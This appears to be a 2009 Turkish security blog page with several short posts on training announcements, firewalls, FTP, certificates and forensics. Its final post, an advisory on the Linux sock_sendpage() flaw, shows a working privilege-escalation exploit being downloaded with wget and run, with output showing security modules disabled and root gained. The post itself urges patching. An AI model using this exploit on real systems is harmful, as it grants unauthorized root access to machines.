SANS Organizasyonunun en popüler eğitimlerinden biri olan “Security 560: Network Penetration Testing and Ethical Hacking” eğitimi Ekim ayında Mentor formatında İstanbul’da verilmeye başlanacak. Eğitim, içerik olarak “Reconnaissance” ile başlayıp “Scanning” , “Exploitation” ve “Password Attacks” şeklinde devam edip “Wireless Attacks” ve “Web Attacks” konularına değindikten sonra bütün anlatılanların bir CTF(Capture The Flag) uygulaması ile sonlandırılacağı bir eğitim olacaktır.
Bu eğitim de öğrenciye SANS’ın “Self Study” eğitiminde olduğu gibi kurs kitapları, kurs CD-DVD leri ve kurs MP3 dosyaları verilecektir. Bunun yanısıra Mentor eğitimine bağlı olarak online kurs materyali ve mentor “hands-on” lab notları öğrenciye verilecektir. 10 adet 2 saatlik oturumlar şeklinde oluşacak ve tamamen “hands-on” lablar şeklinde işlenecek olan eğitim, 10 Ekim 2009 tarihinde başlayıp 12 Aralık 2009 tarihinde sona erecektir. Bu oturumlar İbrahim Saruhan ve Halil Öztürkci tarafindan yönetilecek ve eğitime katılan tüm öğrencilerin lablarda aktif rol olması sağlanacaktır.
Eğitime kayıt detayları ve kayıt için http://www.sans.org/mentor/details.php?nid=19944 adresine bakabilirsiniz. Sorularınız için ibrahim.saruhan@adeo.com.tr ve halil.ozturkci@adeo.com.tr adreslerine mail atabilirsiniz. Read more »
Günümüz İş dünyasinda en büyük sıkıntılardan biri doğru elemani dogru zamanda bulmak. Elaman bulma için çesitli yöntemler deneniyor. En fazla karsilastigimiz yöntem InsanKaynaklari siteleri ve gazeteler ilanları. Firmanin seviyesine göre sadece internet ve gazete degil bu ise yönelmis insan kaynaklari firmalariyla da anlasilabiliyor.
Bir de son zamanlarda LinkedIn* gibi bagimsiz insan kaynagi siteleri devreye girmeye basladi.
Kisisel tecrübelerime göre iyi bir is Insan kaynaklari sitelerinden veya gazetelerden bulunamaz. Insan kaynaklari firmalari burada biraz daha yardimci olabiliyor ama en önemli is bulma kaynagi referans(eskiden tanidik, akraba vs idi)
Sağlam bir referans alınmış en iyi sertifikadan bile değerlidir. Read more »
Netscreen Firewall kurallarını aynı web yönetim arabirimindeki gibi incelemek isterseniz ns2html uygulamasına gözatmanızı öneririm. Böyle bir uygulama nerde lazım olur? Firewall kurallarını analiz etmek icin yetkiniz yoksa ve FW adminlerle uğraşmak istemiyorsanız sadece get config komutunun çıktısını almanız yeterli. Bu çıktıdan aşağıdaki gibi temiz bir html çıktısı elde edip incelemelerinze başlayabilirsiniz. Read more »
FTP protokolü* ve benzeri bir iki protokol(SIP, TFP, IRC) güvenlik duvarlarında en cok problem yasatan protokollerdir. Bunun temel sebebi bu protokollerin sıradan TCP/IP protokollerinden biraz farklı çalışması.
Tanıdığım çoğu Firewall admini bu tip protokollerle ilgili problem yaşadığında konunun detayını bilmediği için sorunu başka yerde arıyor. FTP özelinde konunun anlaşılabilmesi için FTP nasil calisir, FTP cesitleri nelerdir ve güvenlik duvarlarıyla sorunu hakkında birseyler hazırladım. İhtiyaç duyanlar http://www.lifeoverip.net/docs/ftp_ve_firewall/ ulasabilir.
Aynı yazının pdf formatı: http://www.guvenlikegitimleri.com/calismalar/firewall_ftp.pdf
Read more »
2009 yılı başlarında kişisel olarak koyduğum bazı hedeflerim vardı. Bunlardan biri de dünya standartlarında(tekerlegi yeniden keşif yerine yapılmış örnekleri inceleme) bir güvenlik bülteni çıkarabilmek, Türkiye’de güvenlik dünyasının gidişatının yorumlandığı bir bülten olabilmek.
Geniş kitlelelere ulaşabilmek, amacınızı daha iyi anlatabilmek için iletişim dünyasının tüm nimetlerini kullanmamız gerekiyor. Zira bir sektörün gelişmesi o sektörün ne kadar doğru, iyi anlatılabildiğiyle doğru orantılıdır. Günümüzde medya olarak adlandırdığımız bu olgu aslında hayatımızın gidişatını da belirliyor. Bugün herhangi bir konuda birilerinin uzman olarak tanıtılması, bir ürünün sağlam olarak tanıtılması zihinlerde hep bir iz bırakır ve yeri geldiğinde bu iz bazı şeyleri olumlu/olumsuz harekete geçirir.
Günümüzdeki en başarılı iletişim aracı şüphesiz internetdir. Biz, interneti iyi kullanan hatta altyapısını en iyi bilen güvenlikciler olarak bu aracı derdimizi anlatmada pek kullanmıyoruz, kullanamıyoruz. Oysa yaptığımız iş çok önemli, belki ön planda değil belki insanlar hep başı sıkıştığında hatırlıyor olabilir ama stratejik olarak önemli. Kendimiz bu önemi vermezsek başkalarından da vermesini bekleyemeyiz.
Kısaca güvenlik konusunda ne kadar çok sesimiz çıkarsa o kadar başarılı oluruz, bu sektör o kadar gelişir. Bugün işten anlayanların sesi soluğu çıkmadığı için güvenlik konusunda sözü geçenler hep başkaları olmuştur. Geçenlerde güvenlik konusunda önemli işler yaptığı/yapacağı söylenen bir derneğin üye listesini inceliyordum ve sonuç benim için hüsrandı. 100 kişilik listeden tanıdığım, internetten ismini duyduğum 3-4 kişi vardı…
Lafı fazla uzatmadan yukarıda amacımı anlatmaya çalıştığım bülten hazırlığı konusunda değerli yorumlarınızı bekliyorum. İster buraya yorum ekleyerek ister özel mailime göndererek yardımcı olabilirsiniz.
Her türlü öneriye açığım(sadece böyle bir çalışmaya ne gerek vardı demeyin yeter:)
Read more »
E-posta başlıklarından(mail headers) bilgi toplama konulu hazırladığım belgeye http://www.beyazsapka.org/makaleler/e-posta-basliklarindan-bilgi-toplama adresinden erişebilirsiniz.
Aynı belgenin pdf’i http://www.guvenlikegitimleri.com/calismalar/mail_headers.pdf adresinden indirilebilir.
Sonunda cevreden gelen tepkilere dayanamayip Web 2.0(herkes bir isim takıyor ben de web-ng diyorum artık) dünyasının gizemli dünyasına adım attım. Şimdi yavaş yavaş facebook, twitter ve FriendFeed kullanmaya başladım. Linkedin’i zaten uzun süredir aktif olarak kullanıyordum.
Bakalım denildigi gibi faydası olacak mı:).
Merak edenler için web-ng dünyam:
FriendFeed sayfam:http://friednfeed.com/huzeyfeonal
Twitter Sayfam:http://twitter.com/huzeyfeonal
Linkedin sayfam:http://www.linkedin.com/pub/huzeyfe-onal/3/728/356
ps:Konsol ekranlarından buralara gelmek büyük gelişme, zaman daha nelere tanık olacak bakalım…
SANS’ın Forensic eğitmenleri güzel bir yarışma düzenliyor. Yarışmanın amacı Network Forensics’in önemi ve temelinin anlaşılması. Yarışmacılardan https://blogs.sans.org/computer-forensics/2009/08/19/network-forensics-puzzle-contest/ adresinden edinecekleri pcap dosyası içerisindeki IM görüşmeleri ve dosya transferinde geçen dosyayı kaydedilmiş trafik üzerinden çıkarıp göndermeleri isteniyor.
(Trafik dosyası içerisinde şirketten dışarıya sızdırılan bir ofis dosyası ve bazı konuşmalar var, aslında çoğumuzun başına gelen/gelebilecek türden bir olay)Aslında yapılacak işlem basit ama ara adımlarda kullanılacak araçlar ve detay kullanımlarının bilinmezse sonucu ortaya çıkarmak zor olacaktır.
Ekim/Kasim gibi Bilgi Üniversitesinde başlatacağımız Forensic eğitiminde benzeri bulmacalardan fazlasıyla karşılaşabilirsiniz, tabiki önce neyin nasıl yapıldığı anlatılacak sonra bulmaca kısımlarına geçilecek. Tıpkı Network pentest eğitimlerindeki CTF(Capture The Flag ) yarışmaları gibi.
Wildcard sertifikalar tek bir sertifika ile birden fazla web sitesini güvenli hale getirmek için kullanılır. Sayısal sertifiakaların domain isimlerine alındığı gözönüne alınırsa aynı domaine ait her alt domain için farklı sertifika alımı gerekecektir(Örn: www.lifeoverip.net, vpn.lifeoverip.net, mail.lifeoverip.net) Wildcard sertifikayla aynı domaine ait tüm subdomainler için tek bir sertifika yeterli olacaktır.
OpenSSL ile Wildcard sertifika üretimi
Wildcard sertifika üretiminin normal sertifika üretimlerinden farkı yoktur. Sadece host isminin yazıldığı alana www.lifeoverip.net yerine *.lifeoverip.net yazılması gerekir.
# openssl req -new -keyout ./wildcard.req -out ./wildcard.req -days 3652
Generating a 1024 bit RSA private key
…..++++++
…..++++++
writing new private key to ‘./wildcard.req’
Enter PEM pass phrase:
Verifying – Enter PEM pass phrase:
phrase is too short, needs to be at least 4 chars
Enter PEM pass phrase:
Verifying – Enter PEM pass phrase:
—– Read more »
Linux kernel 2.4.X ve 2.6.X sürümlerini etkileyen sifir gun acigi yayinlandi(Linux Kernel ‘sock_sendpage()’ NULL Pointer Dereference Vulnerability). Ozellikle paylasimli sistem kullanip shell hesabi verenlerin acilen güncellemesini öneriyorum.
Aciklikla ilgili çalışan exploitler ve yamalar çıkmış durumda.
Açıklık kullanılarak tek bir komutla siradan bir user root haklarini elde edebiliyor. Klasik exploitlerden farklı olarak exploit yazari derleme vs islemleriyle ugrasilmasin diye bir bash scripti hazirlamis:). Tak calistir mahiyetinde.
Exploit kullanmadan onceki kullanici haklari.
$ id
uid=1001(huzeyfe) gid=1001(huzeyfe) groups=1001(huzeyfe)
Exploitin kullanimi
# wget http://www.grsecurity.net/~spender/exploitx.tgz
huzeyfe@guvenlis:/tmp$ cd exploitx
huzeyfe@guvenlis:/tmp/exploitx$ ls
exploit.c pwnkernel.c tzameti.avi wunderbar_emporium.sh
huzeyfe@guvenlikod:/tmp/wunderbar_emporium$ ./exploitx.sh
[+] Personality set to: PER_SVR4
E: x11wrap.c: XOpenDisplay() failed
E: module.c: Failed to load module “module-x11-publish” (argument: “”): initialization failed.
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xc05b4b7c
[+] Resolved selinux_enabled to 0xc05b4b78
[+] Resolved apparmor_enabled to 0xc04798a4
[+] Resolved apparmor_complain to 0xc05b6770
[+] Resolved apparmor_audit to 0xc05b6778
[+] Resolved apparmor_logsyscall to 0xc05b677c
[+] Resolved security_ops to 0xc05b3324
[+] Resolved default_security_ops to 0xc0478640
[+] Resolved sel_read_enforce to 0xc021fa60
[+] Resolved audit_enabled to 0xc0574544
[+] got ring0!
[+] detected 2.6 style 8k stacks
[+] Disabled security of : LSM
[+] Got root!
#
# id
uid=0(root) gid=0(root) groups=1001(huzeyfe)
Detaylar icin : http://www.securityfocus.com/bid/36038/info
